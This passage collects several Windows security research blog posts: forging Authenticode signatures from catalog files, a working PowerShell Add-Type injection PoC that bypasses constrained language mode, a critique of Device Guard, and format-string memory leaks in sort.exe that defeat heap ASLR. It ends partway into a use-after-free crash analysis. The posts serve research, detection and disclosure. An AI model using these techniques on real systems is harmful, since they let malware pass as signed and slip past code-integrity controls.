Now, if you were wondering why the SignerCertificate thumbprint values don’t match, then you are an astute reader. Considering we applied the identical signature, why doesn’t the certificate thumbprint match? That’s because Get-AuthenticodeSignature first attempts a catalog file lookup of kernel32.dll. In this case, it found a catalog entry for kernel32.dll and is displaying the signature information for the signer of the catalog file. kernel32.dll is also Authenticode signed though. To validate that the thumbprint values for the Authenticode hashes are identical, temporarily stop the CryptSvc service - the service responsible for performing catalog hash lookups. Now you will see that the thumbprint values match. This indicates that the catalog hash was signed with a different code signing certificate from the certificate used to sign kernel32.dll itself.


Application of a Catalog Signature to a PE File


Realistically, CryptSvc will always be running and catalog lookups will be performed. Suppose you want to be mindful of OPSEC and match the identical certificate used to sign your target binary. It turns out, you can actually apply the contents of a catalog file to an embedded PE signature by swapping out the contents of bCertificate in the WIN_CERTIFICATE structure and updating dwLength accordingly. Feel free to follow along as this is done. Note that our goal (in this case) is to apply an Authenticode signature to our unsigned binary that is identical to the one used to sign the containing catalog file: Certificate thumbprint AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033 in this case.

Step #1: Identify the catalog file containing the Authenticode hash of the target binary - kernel32.dll in this case. If a file is Authenticode signed, sigcheck will actually fail to resolve the catalog file. Signtool (included in the Windows SDK) will, however.


Step #2: Open the catalog file in a hex editor and note the file size - 0x000137C7


Step #3: We’re going to manually craft a WIN_CERTIFICATE structure in a hex editor. Let’s go through each field we’ll supply:
  1. dwLength: This is the total length of the WIN_CERTIFICATE structure - i.e. bCertificate bytes plus the size of the other fields = 4 (size of DWORD) + 2 (size of WORD) + 2 (size of WORD) + 0x000137C7 (bCertificate - the file size of the .cat file) = 0x000137CF.
  2. wRevision: This will be 0x0200 to indicate WIN_CERT_REVISION_2_0.
  3. wCertificateType: This will be 0x0002 to indicate WIN_CERT_TYPE_PKCS_SIGNED_DATA.
  4. bCertificate: This will consist of the raw bytes of the catalog file.
When crafting the bytes in the hex editor, be mindful that the fields are stored in little-endian format.
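The same header can also be emitted programmatically rather than typed into a hex editor. A small sketch follows; the paths are illustrative, and BitConverter conveniently emits little-endian bytes on x86/x64:

$CatBytes = [IO.File]::ReadAllBytes('C:\Test\target.cat')
$dwLength = 4 + 2 + 2 + $CatBytes.Length
$Header = [BitConverter]::GetBytes([UInt32] $dwLength) +   # dwLength
          [BitConverter]::GetBytes([UInt16] 0x0200) +      # wRevision: WIN_CERT_REVISION_2_0
          [BitConverter]::GetBytes([UInt16] 0x0002)        # wCertificateType: WIN_CERT_TYPE_PKCS_SIGNED_DATA
[IO.File]::WriteAllBytes('C:\Test\wincert.bin', [byte[]] ($Header + $CatBytes))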


Step #4: Copy all the bytes from the crafted WIN_CERTIFICATE, append them to your unsigned PE, and update the security directory offset and size accordingly.


Now, assuming your calculations and alignments were proper, behold a thumbprint match with that of the catalog file!



Anomaly Detection Ideas


The techniques presented in this blog post have hopefully got some people thinking about how one might go about detecting the abuse of digital signatures. While I have not investigated signature heuristics thoroughly, let me just pose a series of questions that might motivate others to start investigating and writing detections for potential signature anomalies:
  • For a legitimately signed Microsoft PE, is there any correlation between the PE timestamp and the certificate validity period? Would the PE timestamp for attacker-supplied code deviate from the aforementioned correlation?
  • After reading this article, what is your level of trust in a “signed” file that has a hash mismatch?
  • How would you go about detecting a PE file that has an embedded Authenticode signature consisting of a catalog file? Hint: A specific OID mentioned earlier might be useful.
  • How might you go about validating the signature of a catalog-signed file on a different system?
  • What effect might a stopped/disabled CryptSvc service have on security products performing local signature validation? If that were to occur, then most system files, for all intents and purposes, would cease to be signed.
  • Every legitimate PE I’ve seen is padded on a 0x10 byte boundary. The example I showed where I applied the catalog contents to an Authenticode signature is not 0x10 byte aligned.
  • How might you differentiate between a legitimate Microsoft digital signature and one where all the certificate attributes are applied to a self-signed certificate?
  • What if there is data appended beyond the digital signature? This has been abused in the past.
  • Threat intel professionals should find the Authenticode hash to be an interesting data point when investigating identical code with different certificates applied. VirusTotal supplies this as the "Authentihash" value: i.e. the hash value that was calculated with "sigcheck -h". If I were investigating variants of a sample that had more than one hit on a single Authentihash in VirusTotal, I would find that to be very interesting.

Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode


Introduction


Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. Its most realistic enforcement scenarios are when Device Guard or AppLocker is in enforcement mode, because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attacker’s ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in “full language” mode and execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don’t believe me? Find out for yourself by running the following command:

ls C:\* -Recurse -Include '*.ps1', '*.psm1' |
  Select-String -Pattern 'Add-Type' |
  Sort Path -Unique |
  % { Get-AuthenticodeSignature -FilePath $_.Path } |
  ? { $_.SignerCertificate.Subject -match 'Microsoft' }

Exploitation


Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:

$Global:Source = @'
public class Test {
    public static string PrintString(string inputString) {
        return inputString;
    }
}
'@

Add-Type -TypeDefinition $Global:Source

Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

Alright, let’s think the process through together:
  1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
  2. The issue though is that the signed code defines the global variable immediately prior to calling to Add-Type so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
  3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

Weaponization


Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, denying the signed code from setting the global “Source” variable. Here’s a weaponized proof of concept:

Set-Variable -Name Source -Scope Global -Option ReadOnly -Value @'
public class Injected {
    public static string ToString(string inputString) {
        return inputString;
    }
}
'@

Import-Module VulnModule

[Injected]::ToString('Injected!!!')

A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

So did the above vulnerable example sound contrived and unrealistic? You would think so but actually Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was vulnerable to this exact issue. Microsoft fixed this issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can’t remember, to be honest. Matt Nelson and I reported a bunch of these injection bugs that were serviced by the awesome PowerShell team.

Prevention


The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. A single-quoted here-string will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell, watch my “Defensive Coding Strategies for a High-Security Environment” talk that I gave at PSConf.EU.
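For illustration, here is the safe pattern: the here-string is inlined and single-quoted, so there is no variable for an attacker to preempt.

Add-Type -TypeDefinition @'
public class Test {
    public static string PrintString(string inputString) {
        return inputString;
    }
}
'@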

Mitigation


While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule which will block execution based on the filename present in the OriginalFilename field within the “Version Info” resource in a PE. A PowerShell script is obviously not a PE file though - it’s a text file so the FileName rule won’t apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… what if there is more than a single vulnerable version of the same script? You’ve only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of the script, you must know all hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts and collect the hashes and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging. Lee Holmes has an excellent post on how to effectively block older versions of PowerShell in his blog post here.

Another way in which a defender might get lucky regarding vulnerable PowerShell script blocking is due to the fact that most scripts and binaries on the system are catalog signed versus Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So when Microsoft ships updates, eventually, hashes for old versions will fall out and no longer remain “signed.” Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature as indicated by the presence of the following string - “SIG # Begin signature block”. Such bypass scripts exist. Just ask Matt Nelson.

Reporting


If you find a bypass, report it to secure@microsoft.com and earn yourself a CVE. The PowerShell team actively addresses injection flaws, but they are also taking proactive steps to mitigate many of the primitives used to influence code execution in these classes of bug.

Conclusion


While constrained language mode remains an extremely effective means of preventing unsigned code execution, PowerShell and its library of signed modules/scripts remain a large attack surface. I encourage everyone to seek out more injection vulns, report them, earn credit via formal MSRC acknowledgements, and make the PowerShell ecosystem a more secure place. And hopefully, as a writer of PowerShell code, you’ll find yourself thinking more often about how an attacker might be able to influence the execution of your code.

Now, everything that I just explained is great, but it turns out that any call to Add-Type remains vulnerable to injection due to a design issue that permits exploiting a race condition. I really hope that by continuing to shed light on these issues, Microsoft will consider addressing this fundamental problem.

Device Guard and Application Whitelisting on Windows - An Airing of Grievances


Introduction

The purpose of this post is to highlight many of the frustrations I’ve had with Device Guard (rebranded as Windows Defender Application Control) and to discuss why I think it is not an ideal solution for most enterprise scenarios at scale. I’ve spent several years at this point promoting its use, making it as approachable as possible for people to adopt, but from my perspective, I’m not seeing it being openly embraced either within the greater community or by Microsoft (from a public evangelism perspective). Why is that? Hopefully, by calling out the negative experiences I’ve had with it, we might be able to shed light on what improvements can be made, whether or not further investments should be made in Device Guard, or if application whitelisting is even really feasible in Windows (in its current architecture) for the majority of customer use cases.

In an attempt to prove that I’m not just here to complain for the sake of complaining, here is a non-exhaustive list of blog posts and conference presentations I’ve given promoting Device Guard as a solution:

  • Introduction to Windows Device Guard: Introduction and Configuration Strategy
  • Using Device Guard to Mitigate Against Device Guard Bypasses
  • Windows Device Guard Code Integrity Policy Reference
  • Device Guard Code Integrity Policy Auditing Methodology
  • On the Effectiveness of Device Guard User Mode Code Integrity
  • Code Integrity on Nano Server: Tips/Gotchas
  • Updating Device Guard Code Integrity Policies
  • Adventures in Extremely Strict Device Guard Policy Configuration Part 1 — Device Drivers
  • The EMET Attack Surface Reduction Replacement in Windows 10 RS3: The Good, the Bad, and the Ugly
  • BlueHat Israel (presented with Casey Smith) - Device Guard Attack Surface, Bypasses, and Mitigations
  • PowerShell Conference EU - Architecting a Modern Defense using Device Guard and PowerShell

For me, the appeal of Device Guard (and application whitelisting in general) was and remains as follows: every… single… malware report I read, whether it’s vanilla crimeware, red team/pentester tools, or nation-state malware, has at least one component of its attack chain that would have been blocked and subsequently logged with a robust application whitelisting policy enforced. The idea that a technology could not only prevent, but also supply indications and warnings of well-funded nation-state attacks is extremely enticing. In practice however, at scale (and even on single systems to a lesser extent), both the implementation of Device Guard and the overall ability of the OS to enforce code integrity (particularly in user mode) begin to fall apart.

    The Airing of Grievances



    Based on my extensive experience working with Device Guard (which includes regularly subverting it), here is what I see as its shortcomings:

    • An application whitelisting solution that does not supply the ability to create temporary exemptions is unlikely to be a viable solution in the enterprise. This point becomes clear when you consider the following scenario: A new, prospective or current client asks you to join their teleconferencing solution with 30 minutes notice. Telling them that you cannot join because your enforced security solution won’t permit it is simply an unacceptable answer. Some 3rd party whitelisting solutions do permit temporary, quick exceptions to policy and audit accordingly. As a Device Guard expert myself, even if every component of a software package is consistently signed using the same code signing certificate (which is extremely rare), even I wouldn’t be able to build signer rules, update an existing policy, and deploy it in time for the client conference call.
    • Device Guard is not designed to be placed into audit mode for the purposes of supplementing your existing detections. I recently completed a draft blog post where I was going to highlight the benefits of using Device Guard as an extremely simple and effective means to supplement existing detections. After writing the post however, I discovered that it will log the loading of an image that would otherwise have been blocked only once per boot. This is unacceptable from a threat detection perspective because it would introduce a huge visibility gap. I can only assume that Device Guard in audit mode was only ever designed to facilitate the creation of an enforcement policy.
    • The only interface to the creation and maintenance of Device Guard code integrity policies is the ConfigCI PowerShell module which only works on Windows 10 Enterprise. As not only a PowerShell MVP and a Device Guard expert, I shamefully still struggle with using this very poorly designed module. If I still struggle with using the module, this doesn’t bode well for non-PowerShell and Device Guard experts.
    • Feel free to highlight precisely why I’m wrong with supporting evidence, but I sense I’m one of the few people outside (or even inside) of Microsoft who has supplied documentation on practical use cases for configuring and deploying Device Guard. The utter absence of others within Microsoft or the community embracing Device Guard at least supplies me with indirect evidence that it is not a realistic preventative solution at scale. I’ll further note that I don’t feel that Device Guard was ever designed from the beginning as an enterprise security solution. It has the feel that it simply evolved as an extension of Secure Boot policy from the Windows RT era.
    • While the servicing efforts for PowerShell constrained language mode have been mostly phenomenal, the servicing of other Device Guard bypasses has been inconsistent at best. For example, this generic bypass still has yet to be fixed. There is an undocumented “Enabled:Dynamic Code Security” policy rule option that is designed to address that bypass (and it’s great that it’s finally being addressed), but it suffers from a bug that prevents it from working as of Win 10 1803 (it fails to validate the trust of the emitted binary because it forgets to actually mark it as trusted). Additionally, Casey Smith’s “SquiblyTwo” bypass was never serviced, opening the door for additional XSL-based bypasses (which I can confirm exist but can’t talk about at the time of this writing). Rather, it is just recommended that you blacklist wmic.exe. There is also no robust method to block script-based bypasses.
    • The strategy with maintaining AppLocker moving forward remains ambiguous. AppLocker still benefits to this day by its ability to apply rulesets to user and groups, unlike Device Guard. It also has a slightly better PowerShell module and a GUI.
    • New features in Device Guard consistently go undocumented; I typically only discover them by diffing code integrity policy schemas across Windows builds. For example, one of the biggest recent feature additions is the “Enabled:Intelligent Security Graph Authorization” policy rule option - the feature that actually transformed Device Guard from a pure whitelisting solution into an application control solution - yet it has only a single line mentioning it in the documentation (see the note after this list for how it is enabled).
    • As far as application whitelisting on Windows is concerned, from a user-mode enforcement perspective, staying on top of blocking new, non-PE based code execution vectors remains an intractable problem, whether it’s the introduction of new code execution vectors (e.g. Windows Subsystem for Linux) or old code execution techniques being rediscovered (e.g. the fact that you can embed arbitrary WSH scripts in XSL docs). People like myself, Casey Smith, Matt Nelson, and many others in the industry recognize the inability of vendors and those implementing application whitelisting solutions to keep pace with blocking/detecting signed applications that permit the execution of arbitrary, unsigned code and thereby fundamentally subvert user mode code integrity (UMCI). This is precisely what motivates us to continue our research in identifying those target applications/scripts.
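
    For reference (and in lieu of official documentation), the Intelligent Security Graph option is enabled on an existing policy with Set-RuleOption. To the best of my knowledge, option index 14 corresponds to “Enabled:Intelligent Security Graph Authorization” as of recent Windows 10 builds:

    PS > Set-RuleOption -FilePath .\MyPolicy.xml -Option 14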

    So what is Device Guard good for then?


    What I still love about Device Guard is that it’s the only solution that allows you to apply policy to kernel images (even in the very early boot phase). Regardless of the application whitelisting solution, user mode policy configuration, deployment, and maintenance are really difficult. The appeal of driver enforcement is that Windows requires that all drivers be signed, meaning the creation of signer rules is relatively straightforward and the set of required drivers is far smaller than the set of required user mode code.

    Beyond that, I honestly see very little benefit in using Device Guard for user-mode enforcement or detection except on systems with extremely consistent hardware and software configurations - e.g. point of sale systems, ATMs, medical devices, etc.

    For the record, I still use Device Guard to enforce kernel and user mode rules on my personal computers. I still cringe, however, any time I have to make updates to my policy, particularly, for software that isn’t signed or is inconsistently signed.

    Are you admitting that you wasted the past few years dedicating much of your research time to Device Guard?


    Absolutely not!!! I try my best to invest in new security technologies as a motivation to research new abuse and subversion opportunities, and Device Guard was no exception. It motivated me to take a deep dive into code signing and signature enforcement, which resulted in me learning about and abusing all the internals of subject interface packages and trust providers. It also motivated me to identify and report countless Device Guard and PowerShell Constrained Language Mode bypasses, all of which not only bypass application whitelisting solutions but also represent attacker tradecraft that subverts many AV/EDR solutions.

    I also personally have a hard time blindly accepting the opinions of others (even those who are established, respected experts in their respective domains) without personally assessing the efficacy and limitations of a security solution myself. As a result of all my Device Guard research, I now have a very good sense of what does work and what doesn’t work in an application whitelisting solution. I am very grateful for the opportunity that Device Guard presented to motivate me to learn so much more about code signing validation.

    What I’m hopeful for in the future


    While I don’t see a lot of investment behind Device Guard compared to other security technologies (like Defender and Advanced Threat Protection), I sense that Microsoft is throwing a lot of their weight behind Windows Defender System Guard runtime attestation, the details of which are slowly starting to surface. I’m really excited about it, assuming the attestation rule engine is extended to 3rd parties. I can only assume this tweet from Dave Weston highlights System Guard in action blocking semi-legitimate signed drivers, whereas a relatively simple Device Guard policy would have implicitly blocked those drivers.

    Conclusion


    My intent is certainly not to dissuade people from assessing the feasibility of Device Guard in your respective environment. Rather, I want to be as open and transparent about the issues I’ve encountered over the years working with it. My hope is to ignite an open and honest conversation about how application whitelisting in Windows can be improved or if it’s even a worthwhile investment in the first place.

    As a final note, I want to encourage everyone to dive as deep as you can into technology you’re interested in. There are a lot (I can’t emphasize “a lot” enough) of curmudgeons and detractors who will tell you that you’re wasting your time. Don’t listen to them. Only you (and trusted mentors) should dictate the path of your curiosity! I may no longer be the zealous proponent of application whitelisting that I used to be but I could not be more grateful for the incredible technology Microsoft gave me the opportunity to dive into, upon which, I was able to draw my own conclusions.

    Welcome!

    The fact that you are reading this indicates that you and I share a similar passion for exploiting software vulnerabilities. My primary intent with this blog is to motivate myself to learn new exploitation concepts and techniques. The blog will chronicle my feeble attempt to become moderately competent in exploiting software. By sharing what I've learned, my hope is that you will walk away having learned something useful as well. If through the course of my posting I happen to come up with something useful and innovative, great! If you find that I'm reinventing the wheel, so be it. Again, the purpose is to guide me along to my ultimate goal of becoming a legitimate security researcher.

    My first official post will pertain to some brief research I did on memory leaks and the predictability of ASLR on Win32.

    Leveraging format string vulnerabilities to interrogate Win32 process memory

    Although format string vulnerabilities aren't seen as much in the wild these days since they are so easy to spot in source code, I'd like to use this class of vulnerability to demonstrate what information can be inferred from a memory leak. Format string vulnerabilities open a window into the stack, allowing you to interrogate process memory. As a case study I'll be utilizing a format string vulnerability in a Windows utility that has persisted since the dawn of unix time - sort.

    The vulnerability lies in the filename command line argument of the sort utility. The source likely implements the following function call[1]:

    fprintf(file_stream, filename);

    Secure format strings 101 would teach you that this is wrong (the safe form being fprintf(file_stream, "%s", filename)). Nonetheless, some crusty old Microsoft employee made the mistake and MS has deemed this vulnerability not important enough to patch. I digress.

    Some notes about Microsoft's implementation of fprintf in sort as of XP SP3 - Windows 7:
    • The %n format specifier is disabled preventing arbitrary 4-byte overwrites
    • Direct parameter access (%5$p) is disabled which results in very long format strings

    The following example shows the layout of the function arguments on the stack:

    C:\>sort AAAA:%p:%p:%p:%p:%p:%p:%p:
    AAAA:761A35D9:00000000:00000000:00000000:003F47C8:0000001A:41414141:

    Knowledge of how arguments are passed to the printf function would indicate the following:
    • 1st dword: address of the FILE struct
    • 5th dword: pointer to format-string (unicode)
    • 6th dword: number of characters printed
    • 7th dword: hex representation of the first four characters of the format string

    To show that the 5th dword actually points to a unicode representation of the format string, the command can be edited as follows:

    C:\>sort AAAA:%p:%p:%p:%p:%ls
    AAAA:761A35D9:00000000:00000000:00000000:AAAA:%p:%p:%p:%p:%ls:%p:...

    By dereferencing the pointer as a wide string (%ls), the format string was reflected in stderr.

    Some analysis of the above output indicates the presence of ASLR:

    C:\>for /L %i in (1,1,20) do @(sort AAAA:%p:%p:%p:%p:%p:)
    AAAA:761A35D9:00000000:00000000:00000000:000547A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:000E47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003F47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001847A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002247A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:000647A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001147A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002347A8:...
    AAAA:761A35D9:00000000:00000000:00000000:004047A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002E47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003847A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002847A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003947A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002C47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001A47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002947A8:...

    Notice that the 2nd byte of the format string pointer changes each time. After sampling approximately 10000 addresses, some interesting statistics were gleaned:

    2nd byte Occurrences Rate of occurrence
    05       117        1.2%
    06       135        1.4%
    07       109        1.1%
    08        97        1.0%
    09       151        1.5%
    0A       129        1.3%
    0B       147        1.5%
    1C       124        1.2%
    1D       156        1.6%
    1E       193        1.9%
    1F       225        2.3%
    20       192        1.9%
    21       211        2.1%
    22       199        2.0%
    23       207        2.1%
    24       199        2.0%
    25       198        2.0%
    26       213        2.1%
    27       241        2.4%
    28       185        1.9%
    29       238        2.4%
    2A       256        2.6%
    2B       268        2.7%
    2C       246        2.5%
    2D       277        2.8%
    2E       285        2.9%
    2F       275        2.8%
    30       318        3.2%
    31       310        3.1%
    32       321        3.2%
    33       293        2.9%
    34       301        3.0%
    35       331        3.3%
    36       301        3.0%
    37       312        3.1%
    38       306        3.1%
    39       323        3.2%
    3A       312        3.1%
    3B       306        3.1%
    3C       102        1.0%
    3D       121        1.2%
    3E       108        1.1%
    3F        94        0.9%
    40        99        1.0%
    41        90        0.9%
    42        87        0.9%
    43        67        0.7%
    44        54        0.5%
    45        41        0.4%
    46        35        0.4%
    47        32        0.3%
    48        22        0.2%
    49        10        0.1%

    Occurrences divided by 5 (to save space)
    ==================================
    05 #######################
    06 ###########################
    07 #####################
    08 ###################
    09 ##############################
    0A #########################
    0B #############################
    1C ########################
    1D ###############################
    1E ######################################
    1F #############################################
    20 ######################################
    21 ##########################################
    22 #######################################
    23 #########################################
    24 #######################################
    25 #######################################
    26 ##########################################
    27 ################################################
    28 #####################################
    29 ###############################################
    2A ###################################################
    2B #####################################################
    2C #################################################
    2D #######################################################
    2E #########################################################
    2F #######################################################
    30 ###############################################################
    31 ##############################################################
    32 ################################################################
    33 ##########################################################
    34 ############################################################
    35 ##################################################################
    36 ############################################################
    37 ##############################################################
    38 #############################################################
    39 ################################################################
    3A ##############################################################
    3B #############################################################
    3C ####################
    3D ########################
    3E #####################
    3F ##################
    40 ###################
    41 ##################
    42 #################
    43 #############
    44 ##########
    45 ########
    46 #######
    47 ######
    48 ####
    49 ##

    Most frequently used address: 0x0035XXXX
    Times used: 331

    As indicated in this beautiful ASCII bar graph, ASLR clearly favors some addresses over others. This lack of entropy (5-6 bits according to this data) would also indicate that these are heap addresses. Ollie Whitehouse wrote an excellent paper[2] on the analysis of ASLR in Vista, so I will keep my entropy analysis short and sweet.

    To demonstrate the weakness of ASLR in the heap, I'll show that within several attempts, one can read arbitrary data from the heap. As an example, I will read a portion of the environment variables stored in the heap (in unicode). The environment variables are generally stored in the same area relative to their allocated page in memory. Since we know an address in the heap (the format string pointer) and a likely value for the second byte of that address, we should be able to read memory given enough tries. My format string is set up in the following manner:

    sort AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%pZZCBA

    By changing the last format specifier (%p) to %ls, I can dereference 0x00414243 as a wide string (note little-endianness). I want to dereference a likely heap address though. A portion of the environment variables are usually stored in the vicinity of 0x00XX0E30. I'll go with 2E for the 2nd byte because I'm feeling lucky. To dereference 0x002E0E30, the format string will have to be updated:

    sort AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p:%ls0^N.
    where ^N can be entered by pressing ALT-014

    Note that this will likely crash several times since you may be dereferencing unallocated memory. However, after 14 trials, a portion of the path variable was revealed:

    C:\>sort AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p:%ls0^N.
    AAAA761A35D9000000000000000000000000002E48200000002B414141417025702570257025702570257025702570257025702570257025702570257025736C253:\windows\System32\W
    indowsPowerShell\v1.0\;C:\PROGRA~1\DISKEE~1\DISKEE~1\;C:\Program Files\QuickTime\QTSystem\;C:\Program Files\Windows Imaging\0♫.The system cannot find
    the file specified.

    Is this useful? Probably not. I merely chose this example to demonstrate the weakness of ASLR in the heap.

    So now that heap addresses have been located, what about stack addresses? The following gargantuan format string will shed some light on this:



    It would appear as if there are some saved frame pointers, function arguments, local variables, and return pointers here. Let's do some more analysis to be more certain:

    I ran the above command 20 times and truncated everything but a portion of the lower part of the stack, which yielded the following:

    :00000081:0011EC04:000000CB:00010000:00010580:0011EC04:77B46FEA:77B47026:7916B8C8:00010000:...
    :00000081:001AE7C0:000000CB:00010000:00010580:001AE7C0:77B46FEA:77B47026:791DB34A:00010000:...
    :00000081:0018EB10:000000CB:00010000:00010580:0018EB10:77B46FEA:77B47026:791FBFA9:00010000:...
    :00000081:0012E614:000000CB:00010000:00010580:0012E614:77B46FEA:77B47026:7915B27C:00010000:...
    :00000081:001FEAB4:000000CB:00010000:00010580:001FEAB4:77B46FEA:77B47026:7918BE92:00010000:...
    :00000081:0015E780:000000CB:00010000:00010580:0015E780:77B46FEA:77B47026:7912B055:00010000:...
    :00000081:0018E608:000000CB:00010000:00010580:0018E608:77B46FEA:77B47026:791FB18C:00010000:...
    :00000081:000DEC88:000000CB:00010000:00010580:000DEC88:77B46FEA:77B47026:790ABB3B:00010000:...
    :00000081:0009EB10:000000CB:00010000:00010580:0009EB10:77B46FEA:77B47026:790EBC61:00010000:...
    :00000081:0018EB18:000000CB:00010000:00010580:0018EB18:77B46FEA:77B47026:791FBC38:00010000:...
    :00000081:000BE71C:000000CB:00010000:00010580:000BE71C:77B46FEA:77B47026:790CB1D3:00010000:...
    :00000081:000BE8F4:000000CB:00010000:00010580:000BE8F4:77B46FEA:77B47026:790CBE79:00010000:...
    :00000081:0012E954:000000CB:00010000:00010580:0012E954:77B46FEA:77B47026:7915BFE8:00010000:...
    :00000081:000AE8D8:000000CB:00010000:00010580:000AE8D8:77B46FEA:77B47026:790DBEB3:00010000:...
    :00000081:001CEA90:000000CB:00010000:00010580:001CEA90:77B46FEA:77B47026:791BBCB9:00010000:...
    :00000081:0008E4F4:000000CB:00010000:00010580:0008E4F4:77B46FEA:77B47026:790FBD2C:00010000:...
    :00000081:001EEA1C:000000CB:00010000:00010580:001EEA1C:77B46FEA:77B47026:7919B39B:00010000:...
    :00000081:000EE95C:000000CB:00010000:00010580:000EE95C:77B46FEA:77B47026:7909B1AD:00010000:...
    :00000081:0019E7F8:000000CB:00010000:00010580:0019E7F8:77B46FEA:77B47026:791EBF57:00010000:...
    :00000081:000BE574:000000CB:00010000:00010580:000BE574:77B46FEA:77B47026:790CBD2A:00010000:...

    Look at dwords 2, 6, and 9. The last 6 bytes are different after each run. This result is consistent with the ASLR implementation of 14 bits of entropy in the stack. So now we've positively identified heap and stack addresses (process or thread). Now, notice dwords 7-8. The addresses do not change and they are consistent with addresses of loaded modules. To prove this, if you rebooted and analyzed the same portion of the stack, the addresses would be different since loaded modules are only randomized after reboots.

    Conclusion:

    With just a little bit of context, you can easily infer the type of data/code on the stack. In fact, ASLR actually helps in determining the difference between the stack, heap, PEB, and image base (loaded module code) due to the difference in entropy bits.

    This serves as an example where memory leaks coupled with memory corruption will very likely lead to code execution despite modern exploit mitigations. In the context of a format string vulnerability, even if %n is disabled, at the very minimum, shellcode can be placed into memory via the format string. Given any combination of vulnerabilities, the exploitation possibilities are numerous. However, increasingly, with all the modern exploit mitigations, exploitation is becoming very application-specific.

    As a refresher, here are some useful addresses in memory that can help lead to code execution:
    • FS:[0] - Pointer to the SEH chain
    • FS:[30] - Pointer to the PEB
    • Executable's .data + 4 offset: master GS cookie
    • PEB+20: FastPEBLock pointer
    • PEB+24: FastPEBUnlock
    • Stack return pointers: duh
    • Function pointers
    • C++ Vtables

    Links for reference:

    1. Microsoft, "Format Specification Fields: printf and wprintf Functions," http://msdn.microsoft.com/en-us/library/56e442dc.aspx

    2. O. Whitehouse, "An Analysis of Address Space Layout Randomization on Windows Vista™," 2007, http://www.symantec.com/avcenter/reference/Address_Space_Layout_Randomization.pdf

    Post-mortem Analysis of a Use-After-Free Vulnerability (CVE-2011-1260)

    Recently, I've been looking into the exploitation of use-after-free vulnerabilities. This class of bug is very application specific, but armed with just the right amount of knowledge these vulnerabilities can be exploited to bypass most modern OS exploit mitigations. After reading Nephi Johnson's (@d0c_s4vage) excellent article[1] on exploiting an IE use-after-free vulnerability, I decided to ride his coattails and show the steps I used to analyze his proof-of-concept crash code.

    As shown in his blog post, here is Nephi's test case that crashes IE:
    Internet Explorer crashes at mshtml!CElement::Doc+0x2

    (76c.640): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=004aedc0 ecx=004e00e9 edx=00000000 esi=0209e138 edi=00000000
    eip=6d55c402 esp=0209e10c ebp=0209e124 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    mshtml!CElement::Doc+0x2:
    6d55c402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????

    Here is the order of execution leading to the crash:

    mshtml!CTreeNode::ComputeFormats+0x42
